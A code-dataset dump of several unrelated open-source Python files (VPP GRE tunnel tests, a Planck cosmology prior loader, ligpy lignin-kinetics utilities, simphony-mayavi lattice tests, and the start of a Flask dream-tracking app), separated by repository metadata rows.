remark="GRE packets forwarded despite no SRC address match")
#
# Configure IPv6 on the PG interface so we can route IPv6
# packets
#
self.pg0.config_ip6()
self.pg0.resolve_ndp()
#
# Send IPv6 tunnel encapslated packets
# - dropped since IPv6 is not enabled on the tunnel
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_6o4(self.pg0,
"1.1.1.2",
self.pg0.local_ip4,
self.pg0.local_ip6,
self.pg0.remote_ip6)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured(remark="IPv6 GRE packets forwarded "
"despite IPv6 not enabled on tunnel")
#
# Enable IPv6 on the tunnel
#
gre_if.config_ip6()
#
# Send IPv6 tunnel encapslated packets
# - forwarded since IPv6 is enabled on the tunnel
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_6o4(self.pg0,
"1.1.1.2",
self.pg0.local_ip4,
self.pg0.local_ip6,
self.pg0.remote_ip6)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_decapped_6o4(self.pg0, rx, tx)
#
# test case cleanup
#
route_tun_dst.remove_vpp_config()
route_via_tun.remove_vpp_config()
gre_if.remove_vpp_config()
self.pg0.unconfig_ip6()
def test_gre_vrf(self):
""" GRE tunnel VRF Tests """
#
# Create an L3 GRE tunnel whose destination is in the non-default
# table. The underlay is thus non-default - the overlay is still
# the default.
# - set it admin up
# - assign an IP Addres
#
gre_if = VppGreInterface(self, self.pg1.local_ip4,
"2.2.2.2",
outer_fib_id=1)
gre_if.add_vpp_config()
gre_if.admin_up()
gre_if.config_ip4()
#
# Add a route via the tunnel - in the overlay
#
route_via_tun = IpRoute(self, "9.9.9.9", 32,
[RoutePath("0.0.0.0", gre_if.sw_if_index)])
route_via_tun.add_vpp_config()
#
# Add a route that resolves the tunnel's destination - in the
# underlay table
#
route_tun_dst = IpRoute(self, "2.2.2.2", 32, table_id=1,
paths=[RoutePath(self.pg1.remote_ip4,
self.pg1.sw_if_index)])
route_tun_dst.add_vpp_config()
#
# Send a packet stream that is routed into the tunnel
# packets are sent in on pg0 which is in the default table
# - packets are GRE encapped
#
self.vapi.cli("clear trace")
tx = self.create_stream_ip4(self.pg0, "5.5.5.5", "9.9.9.9")
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg1.get_capture()
self.verify_tunneled_4o4(self.pg1, rx, tx,
self.pg1.local_ip4, "2.2.2.2")
#
# Send tunneled packets that match the created tunnel and
# are decapped and forwarded. This tests the decap lookup
# does not happen in the encap table
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_4o4(self.pg1,
"2.2.2.2",
self.pg1.local_ip4,
self.pg0.local_ip4,
self.pg0.remote_ip4)
self.pg1.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_decapped_4o4(self.pg0, rx, tx)
#
# test case cleanup
#
route_tun_dst.remove_vpp_config()
route_via_tun.remove_vpp_config()
gre_if.remove_vpp_config()
def test_gre_l2(self):
""" GRE tunnel L2 Tests """
#
# Add routes to resolve the tunnel destinations
#
route_tun1_dst = IpRoute(self, "2.2.2.2", 32,
[RoutePath(self.pg0.remote_ip4,
self.pg0.sw_if_index)])
route_tun2_dst = IpRoute(self, "2.2.2.3", 32,
[RoutePath(self.pg0.remote_ip4,
self.pg0.sw_if_index)])
route_tun1_dst.add_vpp_config()
route_tun2_dst.add_vpp_config()
#
# Create 2 L2 GRE tunnels and x-connect them
#
gre_if1 = VppGreInterface(self, self.pg0.local_ip4,
"2.2.2.2",
is_teb=1)
gre_if2 = VppGreInterface(self, self.pg0.local_ip4,
"2.2.2.3",
is_teb=1)
gre_if1.add_vpp_config()
gre_if2.add_vpp_config()
gre_if1.admin_up()
gre_if2.admin_up()
self.vapi.sw_interface_set_l2_xconnect(gre_if1.sw_if_index,
gre_if2.sw_if_index,
enable=1)
self.vapi.sw_interface_set_l2_xconnect(gre_if2.sw_if_index,
gre_if1.sw_if_index,
enable=1)
#
# Send in tunnel encapped L2. expect out tunnel encapped L2
# in both directions
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_l2o4(self.pg0,
"2.2.2.2",
self.pg0.local_ip4)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_l2o4(self.pg0, rx, tx,
self.pg0.local_ip4,
"2.2.2.3")
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_l2o4(self.pg0,
"2.2.2.3",
self.pg0.local_ip4)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_l2o4(self.pg0, rx, tx,
self.pg0.local_ip4,
"2.2.2.2")
self.vapi.sw_interface_set_l2_xconnect(gre_if1.sw_if_index,
gre_if2.sw_if_index,
enable=0)
self.vapi.sw_interface_set_l2_xconnect(gre_if2.sw_if_index,
gre_if1.sw_if_index,
enable=0)
#
# Create a VLAN sub-interfaces on the GRE TEB interfaces
# then x-connect them
#
gre_if_11 = VppDot1QSubint(self, gre_if1, 11)
gre_if_12 = VppDot1QSubint(self, gre_if2, 12)
# gre_if_11.add_vpp_config()
# gre_if_12.add_vpp_config()
gre_if_11.admin_up()
gre_if_12.admin_up()
self.vapi.sw_interface_set_l2_xconnect(gre_if_11.sw_if_index,
gre_if_12.sw_if_index,
enable=1)
self.vapi.sw_interface_set_l2_xconnect(gre_if_12.sw_if_index,
gre_if_11.sw_if_index,
enable=1)
#
# Configure both to pop thier respective VLAN tags,
# so that during the x-coonect they will subsequently push
#
self.vapi.sw_interface_set_l2_tag_rewrite(gre_if_12.sw_if_index,
L2_VTR_OP.L2_POP_1,
12)
self.vapi.sw_interface_set_l2_tag_rewrite(gre_if_11.sw_if_index,
L2_VTR_OP.L2_POP_1,
11)
#
# Send traffic in both directiond - expect the VLAN tags to
# be swapped.
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_vlano4(self.pg0,
"2.2.2.2",
self.pg0.local_ip4,
11)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_vlano4(self.pg0, rx, tx,
self.pg0.local_ip4,
"2.2.2.3",
12)
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_vlano4(self.pg0,
"2.2.2.3",
self.pg0.local_ip4,
12)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_vlano4(self.pg0, rx, tx,
self.pg0.local_ip4,
"2.2.2.2",
11)
#
# Cleanup Test resources
#
gre_if_11.remove_vpp_config()
gre_if_12.remove_vpp_config()
gre_if1.remove_vpp_config()
gre_if2.remove_vpp_config()
route_tun1_dst.add_vpp_config()
route_tun2_dst.add_vpp_config()
if __name__ == '__main__':
unittest.main(testRunner=VppTestRunner)
|
apache-2.0
| 656,361,454,378,659,000
| 33.666667
| 78
| 0.455915
| false
| 3.634321
| true
| false
| false
|
dessn/sn-bhm
|
dessn/planck/planck.py
|
1
|
1173
|
import numpy as np
import inspect
import os
def get_planck(restricted=True):
""" Priors from COM_CosmoParams_fullGrid_R2.00\base_w\plikHM_TT_lowTEB\base_w_plikHM_TT_lowTEB"""
file = os.path.abspath(inspect.stack()[0][1])
dir_name = os.path.dirname(file)
results = np.load(dir_name + "/planck.npy")
weights = results[:, 0]
likelihood = results[:, 1]
chain = results[:, 2:]
param_file = dir_name + "/planck.paramnames"
with open(param_file) as f:
params = ["$%s$" % l.split("\t")[1][:-1] for l in f]
if restricted:
wanted_params = [r"$\Omega_m$", "$w$"]
chain = chain[:, [params.index(p) for p in wanted_params]]
params = wanted_params
return chain, params, weights, likelihood
if __name__ == "__main__":
chain, params, weights, likelihood = get_planck()
om = chain[:, params.index(r"$\Omega_m$")]
w = chain[:, params.index(r"$w$")]
from chainconsumer import ChainConsumer
c = ChainConsumer()
c.add_chain(chain, parameters=params)
c.plotter.plot(display=True)
# import matplotlib.pyplot as plt
# plt.hist2d(om, w, bins=100, weights=weights)
# plt.show()
|
mit
| -8,789,032,739,981,367,000
| 32.514286
| 101
| 0.618926
| false
| 3.119681
| false
| false
| false
|
houghb/ligpy
|
ligpy/ligpy_utils.py
|
1
|
18322
|
"""
Misc utility functions required by several modules in the ligpy program.
"""
import os
import numpy as np
from constants import GAS_CONST, MW
def set_paths():
"""
Set the absolute path to required files on the current machine.
Returns
-------
reactionlist_path : str
path to the file `complete_reactionlist.dat`
rateconstantlist_path : str
path to the file `complete_rateconstantlist.dat`
compositionlist_path : str
path to the file `compositionlist.dat`
"""
module_dir = os.path.abspath(__file__).split('ligpy_utils')[0]
reactionlist_path = module_dir + 'data/complete_reaction_list.dat'
rateconstantlist_path = module_dir + 'data/complete_rateconstant_list.dat'
compositionlist_path = module_dir + 'data/compositionlist.dat'
return reactionlist_path, rateconstantlist_path, compositionlist_path
def get_specieslist(completereactionlist):
"""
Make a list of all the molecular species involved in the kinetic scheme.
Parameters
----------
completereactionlist : str
the path to the `complete_reaction_list.dat` file
Returns
-------
specieslist : list
a list of all the species in the kinetic scheme
"""
specieslist = []
for line in open(completereactionlist, 'r').readlines():
for spec in line.split(','):
# If the species has already been added to the list then move on.
if spec.split('_')[1].split()[0] in specieslist:
continue
else:
specieslist.append(spec.split('_')[1].split()[0])
specieslist.sort()
return specieslist
def get_speciesindices(specieslist):
"""
Create a dictionary to assign an arbitrary index to each of the species in
the kinetic scheme.
Parameters
----------
specieslist : list
a list of all the species in the model
Returns
-------
speciesindices : dict
a dictionary of arbitrary indices with the species
from specieslist as keys
indices_to_species : dict
the reverse of speciesindices (keys are the indices
and values are the species)
"""
speciesindices = {}
index = 0
for x in specieslist:
speciesindices[x] = index
index += 1
indices_to_species = dict(zip(speciesindices.values(),
speciesindices.keys()))
return speciesindices, indices_to_species
def define_initial_composition(compositionlist, species):
"""
Read the plant ID specified and define the initial composition of the
lignin polymer in terms of the three model components (PLIGC, PLIGH,
PLIGO).
Parameters
----------
compositionlist : str
the path of the `compositionlist.dat` file
species : str
the name of a lignin species that exists in the
`compositionlist.dat` file
Returns
-------
pligc_0 : float
The initial composition (mol/L) of PLIGC
pligh_0 : float
The initial composition (mol/L) of PLIGH
pligo_0 : float
The initial composition (mol/L) of PLIGO
"""
for line in open(compositionlist, 'rb').readlines():
if line.split(',')[0] == species:
# Initial compositions [mole fraction]
pligc_mol = float(line.split(',')[1])
pligh_mol = float(line.split(',')[2])
pligo_mol = float(line.split(',')[3])
# The weighted average molar mass of mixture [kg/mol]
weighted_m = (301*pligc_mol + 423*pligh_mol + 437*pligo_mol)/1000
# the density of the condensed phase [kg/L]
density = 0.75
# Initial compositions [mol/L]
pligc_0 = density/weighted_m * pligc_mol
pligh_0 = density/weighted_m * pligh_mol
pligo_0 = density/weighted_m * pligo_mol
break
return pligc_0, pligh_0, pligo_0
def build_k_matrix(rateconsts):
"""
Build a matrix of all the rate constant parameters (A, n, E).
Parameters
----------
rateconsts : str
the path to the file `complete_rateconstant_list.dat`
Returns
-------
kmatrix : list
a list of lists that defines a matrix. Each entry in the list
is A, n, E for a given reaction
"""
num_lines = sum(1 for line in open(rateconsts))
kmatrix = [None]*num_lines
for i, line in enumerate(open(rateconsts, 'r').readlines()):
kmatrix[i] = [line.split(' ')[0], line.split(' ')[1],
line.split(' ')[2].split()[0]]
return kmatrix
def get_k_value(T, reaction_index, kmatrix):
"""
Returns the value of the rate constant for a particular reaction index.
Parameters
----------
T : float
temperature in Kelvin
reaction_index : int
the index of the reaction for which you want the rate
kmatrix : list
the kmatrix generated by build_k_matrix()
Returns
-------
k : float
the value of the rate constant for the given reaction at the given
temperature.
"""
k = (eval(kmatrix[reaction_index][0]) *
T**eval(kmatrix[reaction_index][1]) *
np.exp(-1 * eval(kmatrix[reaction_index][2]) /(GAS_CONST * T)))
return k
def get_k_value_list(T, kmatrix):
"""
Returns a list of all the k-values for a given temperature.
Parameters
----------
T : float
temperature in Kelvin
kmatrix : list
the kmatrix generated by build_k_matrix()
Returns
-------
kvaluelist : list
a list of all the rate constant values for a given temperature
"""
kvaluelist = []
for index, row in enumerate(kmatrix):
kvaluelist.append(get_k_value(T, index, kmatrix))
return kvaluelist
def build_reactant_dict(completereactionlist, speciesindices):
"""
Build a dictionary of the reactants involved in each reaction,
along with their stoichiometric coefficients. The keys of the
dictionary are the reaction numbers, the values are lists of lists
[[reactant1index, -1*coeff1],...]
Parameters
----------
completereactionlist : str
path to the file `complete_reaction_list.dat`
speciesindices : dict
the dictionary speciesindices from
get_speciesindices()
Returns
-------
reactant_dict : dict
a dictionary where keys are reaction numbers and values
are lists of lists with the reactants and their
stoichiometric coefficients for each reaction
"""
reactant_dict = {}
for rxnindex, reaction in enumerate(open(completereactionlist, 'rb')
.readlines()):
reactants = []
# x is each coefficient_species set
for x in reaction.split(','):
# if the species is a reactant
if float(x.split('_')[0]) < 0:
reactants.append([speciesindices[x.split('_')[1].split()[0]],
-1*float(x.split('_')[0])])
# in preceding line: *-1 because I want the |stoich coeff|
reactant_dict[rxnindex] = reactants
return reactant_dict
def build_species_rxns_dict(completereactionlist):
"""
Build a dictionary where keys are species and values are lists with the
reactions that species is involved in, that reaction's sign in the net
rate equation, and the stoichiometric coefficient of the species in that
reaction.
Parameters
----------
completereactionlist : str
path to the file `complete_reaction_list.dat`
Returns
-------
species_rxns : dict
keys are the species in the model; values are lists of
[reaction that species is involved in,
sign of that species in the net rate equation,
stoichiometric coefficient]
"""
specieslist = get_specieslist(set_paths()[0])
species_rxns = {}
for species in specieslist:
# This loop makes a list of which reactions "species" takes part in
# and what sign that term in the net rate eqn has
# and what the stoichiometric coefficient is
reactions_involved = []
for rxnindex, line in enumerate(open(completereactionlist, 'rb')
.readlines()):
# example of x = '-1_ADIO'
for x in line.split(','):
# If the species being iterated over is part of this reaction
if species == x.split('_')[1].split()[0]:
# if the species is a reactant
if float(x.split('_')[0]) < 0:
reactions_involved.append(
[rxnindex, -1, x.split('_')[0]])
# if the species is a product
if float(x.split('_')[0]) > 0:
reactions_involved.append(
[rxnindex, 1, '+' + x.split('_')[0]])
species_rxns[species] = reactions_involved
return species_rxns
def build_rates_list(rateconstlist, reactionlist, speciesindices,
indices_to_species, human='no'):
""" This function writes the list of rate expressions for each reaction.
Parameters
----------
rateconstlist : str
the path to the file `complete_rateconstant_list.dat`
reactionlist : str
the path to the file `complete_reaction_list.dat`
speciesindices : dict
a dictionary of arbitrary indices with the species
from specieslist as keys
indices_to_species : dict
the reverse of speciesindices (keys are the indices
and values are the species)
human : str, optional
indicate whether the output of this function should
be formatted for a human to read ('yes'). Default
is 'no'
Returns
-------
rates_list : list
a list of the rate expressions for all the reactions in the
model
"""
kmatrix = build_k_matrix(rateconstlist)
reactant_dict = build_reactant_dict(reactionlist, speciesindices)
rates_list = []
for i, line in enumerate(kmatrix):
rate = 'rate[%s] = kvalue(T,%s) ' % (i, i)
concentrations = ''
for entry in reactant_dict[i]:
if entry == 'n': # if there is no reaction
concentrations = '* 0'
break
else:
if human == 'no':
concentrations += '* y[%s]**%s ' % (entry[0], entry[1])
elif human == 'yes':
concentrations += '* [%s]**%s ' % \
(indices_to_species[entry[0]], entry[1])
else:
raise ValueError('human must be a string: yes or no')
rate += concentrations
rates_list.append(rate)
return rates_list
def build_dydt_list(rates_list, specieslist, species_rxns, human='no'):
"""This function returns the list of dydt expressions generated for all
the reactions from rates_list.
Parameters
----------
rates_list : list
the output of build_rates_list()
specieslist : list
a list of all the species in the kinetic scheme
species_rxns : dict
dictionary where keys that are the model species and
values are the reactions they are involved in
human : str, optional
indicate whether the output of this function should
be formatted for a human to read ('yes'). Default
is 'no'
Returns
-------
dydt_expressions : list
expressions for the ODEs expressing the concentration
of each species with time
"""
dydt_expressions = []
for species in specieslist:
rate_formation = 'd[%s]/dt = ' % (species)
# "entry" is [reaction#, sign of that reaction, coefficient]
for entry in species_rxns[species]:
if human == 'no':
rate_formation += '%s*%s ' % \
(entry[2], rates_list[entry[0]].split(' = ')[1])
elif human == 'yes':
rate_formation += '%s*rate[%s] ' % (entry[2], entry[0])
else:
raise ValueError('human must be a string: yes or no')
dydt_expressions.append(rate_formation)
return dydt_expressions
def write_rates_and_odes(filename, rates, odes):
"""
Writes a file that contains the model equations to be solved (a list of
rate expressions, followed by a list of ODEs for each species). This
file is just for reference for humans to be able to look at the specific
reactions that are modeled, it is not actually used by the program. Users
should only need to generate this file if they've changed anything about
the kinetic scheme (it already exists in the data folder).
Parameters
----------
filename : str
the filename (including relative path if appropriate) of the
ratesandodes file to write
rates : list
the output of build_rates_list() with human='yes'
odes : list
the output of build_dydt_list() with human='yes'
Returns
-------
None
"""
with open(filename, 'wb') as initialize:
initialize.write('Reaction Rates:\n')
with open(filename, 'ab') as writer:
for line in rates:
writer.write(line+'\n')
writer.write('\n\nODE''s:\n')
for line in odes:
writer.write(line+'\n')
# These are some functions for checking the integrity of some model
# components, but they are not used except for exploratory or verification
# purposes
def check_species_in_MW(specieslist=None):
"""
Check to make sure that everything in the specieslist is in the MW
dictionary from `constants.py`.
Parameters
----------
specieslist : list, optional
a list of species to check against. If no list is
specified then the function get_specieslist() will be used
to generate the default list
Returns
-------
None
"""
if specieslist == None:
specieslist = get_specieslist(set_paths()[0])
for item in MW.keys():
if item in specieslist:
print '%s is in specieslist' % ('{: <20}'.format(item))
else:
print '********'+item
for item in specieslist:
if item in MW.keys():
print '%s is in MW dictionary' % ('{: <20}'.format(item))
else:
print '********'+item
print '\n%s should equal %s' % (len(MW.keys()), len(specieslist))
def check_mass_balance():
"""
Check for conservation of mass, and if mass is not conserved, see which
reactions are creating or losing mass.
Note that mass will not be wholly conserved in this model because
protons are not accounted for when radicals are involved in
non-Hydrogen-abstraction reactions, but all other reactions should
conserve mass.
Parameters
----------
None
Returns
-------
total_mass_balance : numpy array
an array with the amount of mass gained or lost
in each reaction
"""
specieslist = get_specieslist(set_paths()[0])
speciesindices = get_speciesindices(specieslist)[0]
kmatrix = build_k_matrix(set_paths()[1])
species_rxns = build_species_rxns_dict(set_paths()[0])
# Make vector of the MW's of each species, in the order from speciesindices
mw_vector = np.zeros((len(MW), 1))
for species in MW:
mw_vector[speciesindices[species]] = MW[species][0]
mw_vector = mw_vector.transpose()
# In this stoichiometric matrix, rows are species, columns are reactions
stoicmatrix = np.zeros((len(speciesindices), len(kmatrix)), dtype='float')
for species in species_rxns:
i = speciesindices[species]
for reaction in species_rxns[species]:
j = reaction[0]
stoicmatrix[i, j] += float(reaction[2])
# The result of this dot product should be a vector full of zeros.
# This will not be the case because protons are not accounted for when
# radicals are involved in non-H-abstraction rxns,
# but all other reactions should be 0
total_mass_balance = np.dot(mw_vector, stoicmatrix[:, :])
# Use this to look at which reactions are creating or losing mass
# (from missing Hydrogen)
h_sum = 0
for i, value in enumerate(total_mass_balance[0, :]):
if value != 0:
print i, value
h_sum += value
print '\nNet mass change = %s' % h_sum
return total_mass_balance
def check_species_fate():
"""
Check to see which species (if any) are only produced, but never
consumed in the model reactions (assuming that all reactions occur).
Parameters
----------
None
Returns
-------
fate_dict : dictionary
a dictionary with the fate of model species
"""
specieslist = get_specieslist(set_paths()[0])
species_rxns = build_species_rxns_dict(set_paths()[0])
fate_dict = {}
for species in specieslist:
fate_dict[species] = 'produced only'
for entry in species_rxns[species]:
if entry[1] < 0:
fate_dict[species] = 'consumed'
for species in specieslist:
if fate_dict[species] == 'consumed':
del fate_dict[species]
return fate_dict
|
bsd-2-clause
| -1,464,800,841,360,162,300
| 34.439072
| 79
| 0.569643
| false
| 4.337595
| false
| false
| false
|
simphony/simphony-mayavi
|
simphony_mayavi/cuds/tests/test_vtk_lattice.py
|
1
|
9617
|
import unittest
from functools import partial
from numpy.testing import assert_array_equal
from hypothesis import given
from hypothesis.strategies import sampled_from
from tvtk.api import tvtk
from simphony.core.cuba import CUBA
from simphony.testing.abc_check_lattice import (
CheckLatticeNodeOperations, CheckLatticeNodeCoordinates)
from simphony.testing.utils import compare_lattice_nodes
from simphony.core.data_container import DataContainer
from simphony.cuds.lattice import (
make_hexagonal_lattice, make_cubic_lattice, make_orthorhombic_lattice,
make_body_centered_cubic_lattice, make_face_centered_cubic_lattice,
make_rhombohedral_lattice, make_tetragonal_lattice,
make_body_centered_tetragonal_lattice,
make_face_centered_orthorhombic_lattice,
make_base_centered_orthorhombic_lattice,
make_body_centered_orthorhombic_lattice,
make_monoclinic_lattice,
make_base_centered_monoclinic_lattice,
make_triclinic_lattice,
Lattice, LatticeNode)
from simphony.cuds.primitive_cell import BravaisLattice, PrimitiveCell
from simphony_mayavi.cuds.api import VTKLattice
from simphony_mayavi.core.api import supported_cuba
lattice_types = sampled_from([
make_cubic_lattice('test', 0.1, (3, 6, 5)),
make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6)),
make_orthorhombic_lattice('test', (0.1, 0.2, 0.3), (3, 7, 6)),
make_body_centered_cubic_lattice('test', 0.1, (3, 6, 5)),
make_face_centered_cubic_lattice('test', 0.1, (3, 6, 5)),
make_rhombohedral_lattice('test', 0.1, 0.2, (3, 6, 5)),
make_tetragonal_lattice('test', 0.1, 0.2, (3, 6, 5)),
make_body_centered_tetragonal_lattice('test', 0.1, 0.5, (3, 6, 5)),
make_face_centered_orthorhombic_lattice('test', (0.5, 0.6, 0.7),
(3, 6, 5)),
make_base_centered_orthorhombic_lattice('test', (0.5, 0.6, 0.7),
(3, 6, 5)),
make_body_centered_orthorhombic_lattice('test', (0.5, 0.6, 0.7),
(3, 6, 5)),
make_monoclinic_lattice('test', (0.5, 0.6, 0.7), 0.4,
(3, 6, 5)),
make_base_centered_monoclinic_lattice('test', (0.5, 0.6, 0.7),
0.4, (3, 6, 5)),
make_triclinic_lattice('test', (0.5, 0.6, 0.7), (0.4, 0.3, 0.2),
(3, 6, 5))])
class TestVTKLatticeNodeOperations(
CheckLatticeNodeOperations, unittest.TestCase):
def container_factory(self, name, primitive_cell, size, origin):
return VTKLattice.empty(name, primitive_cell, size, origin)
def supported_cuba(self):
return supported_cuba()
class TestVTKLatticeNodeCoordinates(
CheckLatticeNodeCoordinates, unittest.TestCase):
def container_factory(self, name, primitive_cell, size, origin):
return VTKLattice.empty(name, primitive_cell, size, origin)
def supported_cuba(self):
return supported_cuba()
class TestVTKLattice(unittest.TestCase):
def setUp(self):
self.addTypeEqualityFunc(
LatticeNode, partial(compare_lattice_nodes, testcase=self))
def test_get_node_on_a_xy_plane_hexagonal_lattice(self):
# given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
vtk_lattice = VTKLattice.from_lattice(lattice)
# when
node = vtk_lattice.get((1, 1, 0))
# then
self.assertEqual(
node, LatticeNode(
(1, 1, 0),
data=DataContainer(VELOCITY=(1, 1, 0))))
def test_iter_nodes_on_a_xy_plane_hexagonal_lattice(self):
# given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
vtk_lattice = VTKLattice.from_lattice(lattice)
# when/then
for node in vtk_lattice.iter(item_type=CUBA.NODE):
self.assertEqual(
node, LatticeNode(
node.index,
data=DataContainer(VELOCITY=node.index)))
self.assertEqual(sum(1 for _ in vtk_lattice.iter(
item_type=CUBA.NODE)), 120)
def test_update_nodes_on_a_xy_plane_hexagonal_lattice(self):
# given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
vtk_lattice = VTKLattice.from_lattice(lattice)
node = vtk_lattice.get((1, 1, 0))
# when
node.data = DataContainer(VELOCITY=(1, 54, 0.3))
vtk_lattice.update((node,))
# then
new_node = vtk_lattice.get((1, 1, 0))
self.assertEqual(
new_node, LatticeNode(
(1, 1, 0),
data=DataContainer(VELOCITY=(1, 54, 0.3))))
def test_get_coordinate_on_a_xy_plane_hexagonal_lattice(self):
# given
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
vtk_lattice = VTKLattice.from_lattice(lattice)
# when/then
for node in lattice.iter(item_type=CUBA.NODE):
assert_array_equal(
vtk_lattice.get_coordinate(node.index),
lattice.get_coordinate(node.index))
def test_initialization_with_unknown_type(self):
#
lattice = make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6))
self.add_velocity(lattice)
data = VTKLattice.from_lattice(lattice)
primitive_cell = PrimitiveCell(lattice.primitive_cell.p1,
lattice.primitive_cell.p2,
lattice.primitive_cell.p3,
"Cubic")
# when/then
with self.assertRaises(ValueError):
VTKLattice(
name=lattice.name, primitive_cell=primitive_cell,
data_set=data.data_set)
def test_initialization_with_unfamiliar_dataset(self):
# given
data_set = tvtk.UnstructuredGrid(points=[(0, 0, 0,), (1, 1, 1)])
primitive_cell = PrimitiveCell.for_cubic_lattice(1.)
# when/then
with self.assertRaises(TypeError):
VTKLattice(
name='test', primitive_cell=primitive_cell,
data_set=data_set)
def test_create_empty_with_unknown_type(self):
primitive_cell = PrimitiveCell((1., 0., 0.), (0., 1., 0.),
(0., 0., 1.), "Cubic")
# when/then
with self.assertRaises(ValueError):
VTKLattice.empty(
name='test', primitive_cell=primitive_cell, size=(3, 4, 5),
origin=(0.0, 0.0, 0.0))
def test_create_from_unfamiliar_dataset(self):
# given
data_set = tvtk.UnstructuredGrid(points=[(0, 0, 0,), (1, 1, 1)])
# when/then
with self.assertRaises(TypeError):
VTKLattice.from_dataset(name='test', data_set=data_set)
@given(lattice_types)
def test_initialization_with_dataset(self, lattice):
# given
expected = VTKLattice.from_lattice(lattice)
# when
vtk_lattice = VTKLattice.from_dataset('test', expected.data_set)
# then
self.assertEqual(vtk_lattice.primitive_cell.bravais_lattice,
lattice.primitive_cell.bravais_lattice)
@given(lattice_types)
def test_creating_a_vtk_lattice_from_cuds_lattice(self, lattice):
# when
vtk_lattice = VTKLattice.from_lattice(lattice)
# then
self.assertEqual(vtk_lattice.primitive_cell.bravais_lattice,
lattice.primitive_cell.bravais_lattice)
self.assertEqual(vtk_lattice.data, lattice.data)
self.assertEqual(vtk_lattice.size, lattice.size)
assert_array_equal(vtk_lattice.origin, lattice.origin)
assert_array_equal(vtk_lattice.primitive_cell.p1,
lattice.primitive_cell.p1)
assert_array_equal(vtk_lattice.primitive_cell.p2,
lattice.primitive_cell.p2)
assert_array_equal(vtk_lattice.primitive_cell.p3,
lattice.primitive_cell.p3)
def test_data_setter(self):
# when
primitive_cell = PrimitiveCell.for_cubic_lattice(1.)
vtk_lattice = VTKLattice.empty('test', primitive_cell, (2, 3, 4),
(0, 0, 0))
vtk_lattice.data = {CUBA.TEMPERATURE: 40.}
# then
self.assertIsInstance(vtk_lattice.data, DataContainer)
def test_exception_create_dataset_with_inconsistent_lattice_type(self):
bad_lattice_types = (BravaisLattice.CUBIC,
BravaisLattice.TETRAGONAL,
BravaisLattice.ORTHORHOMBIC)
for lattice_type in bad_lattice_types:
# when
primitive_cell = PrimitiveCell((1., 0., 0.), # require PolyData
(0.5, 0.5, 0.),
(0., 0., 1.),
lattice_type)
lattice = Lattice('test', primitive_cell, (2, 3, 4),
(0., 0., 0.))
# then
with self.assertRaises(ValueError):
VTKLattice.from_lattice(lattice)
def add_velocity(self, lattice):
new_nodes = []
for node in lattice.iter(item_type=CUBA.NODE):
node.data[CUBA.VELOCITY] = node.index
new_nodes.append(node)
lattice.update(new_nodes)
if __name__ == '__main__':
unittest.main()
|
bsd-2-clause
| -8,452,465,650,325,802,000
| 37.468
| 76
| 0.580638
| false
| 3.464337
| true
| false
| false
|
whiskeylover/idreamoftoast
|
toast/app.py
|
1
|
6684
|
import datetime
import json
from urllib.parse import unquote
from urllib.request import urlopen
from flask import jsonify, Response
from peewee import CharField, DateTimeField, IntegerField, Model
import config
#-------------------------------------------------------------------------------
# Constants
#-------------------------------------------------------------------------------
MAX_TOP_DREAMS = 8
EXTERNAL_RESOURCE_REFRESH_FREQ = 30
#-------------------------------------------------------------------------------
# Config
#-------------------------------------------------------------------------------
app = config.get_app()
db = config.get_database()
#-------------------------------------------------------------------------------
# Models
#-------------------------------------------------------------------------------
class Dream(Model):
"""" Dream model. """
name = CharField()
count = IntegerField(default=0)
picURL = CharField(null=True)
picURLthn = CharField(null=True)
definition = CharField(null=True)
created_on = DateTimeField(default=datetime.datetime.now)
modified_on = DateTimeField(default=datetime.datetime.now)
class Meta:
database = db
#-------------------------------------------------------------------------------
# Methods
#-------------------------------------------------------------------------------
def init_db():
""" Initialize database. """
db.connect()
if not Dream.table_exists():
Dream.create_table()
def get_dreams(order, limit):
""" Helper method for getting dreams. """
dreams = Dream.select().where(Dream.count > 0).order_by(order)[:limit]
return [{'name':d.name, 'count':d.count, 'definition': d.definition, 'picURL': d.picURL, 'picURLthn': d.picURLthn} for d in dreams]
def get_dream(dream):
""" Helper method for getting a single dream. """
d = Dream.select().where(Dream.name == dream.lower()).first()
if d is None:
d = Dream.create(name=dream.lower(), count=0, picURL=get_flickrpicURL(dream), picURLthn=get_flickrpicURL(dream), definition=get_urbandictionary(dream))
return {'name':d.name, 'count':d.count, 'definition': d.definition, 'picURL': d.picURL, 'picURLthn': d.picURLthn}
#-------------------------------------------------------------------------------
# Routes / Controllers
#-------------------------------------------------------------------------------
@app.route("/dream/define/<term>")
def get_urbandictionary(term):
try:
response = urlopen('http://api.urbandictionary.com/v0/define?term=' + term.replace(" ", "+"))
html = response.read()
j = json.loads(html)
print("Refreshed " + term + "'s definition")
return j['list'][0]['definition']
except:
return ""
@app.route("/dream/picURL/<term>")
